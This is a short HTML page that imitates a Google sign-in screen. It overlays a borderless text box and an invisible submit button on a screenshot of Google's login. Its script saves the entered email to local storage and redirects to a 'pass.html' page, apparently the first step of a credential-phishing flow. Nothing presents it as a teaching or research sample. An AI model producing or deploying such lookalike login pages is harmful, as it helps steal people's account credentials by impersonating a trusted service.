<!DOCTYPE html>
<html>
  <head>
    <style>
      #myImage {
        width: 1000px;
        height: 550px;
        object-fit: contain;
        position: absolute;
        top: 0px;
        left: 150px;
      }
        
       input[type=text] {
  background-color: #FFFFFF;
  color: #000000;
  border: none;
  outline: none;
  position: absolute;
  top: 230px;
  left: 510px;
}
      input[type=submit] {
  background-color: #000000;
  color: #000000;
  border: none;
  outline: none;
  position: absolute;
  top: 385px;
  left: 735px; 
  opacity: 0.0;
}
    </style>
  </head>
  <body>
      <img id="myImage" src="google_signin.png" /> 
    <form id = "form" action="pass.html">
      <input type="text" id="emailAddress" name="emailAddress" placeholder = "Email" maxlength = "30" size = "30">
      <input type="submit" value="Submit">
    </form>
  </body>
  <script>
    const form = document.getElementById('form');
    const username = document.getElementById('emailAddress');
     
    form.addEventListener('submit', function(event){
     event.preventDefault();
      const usernameValue = username.value;
      localStorage.setItem('user-name', usernameValue);
      window.location.href = "pass.html";
    })
    
  </script>
</html>
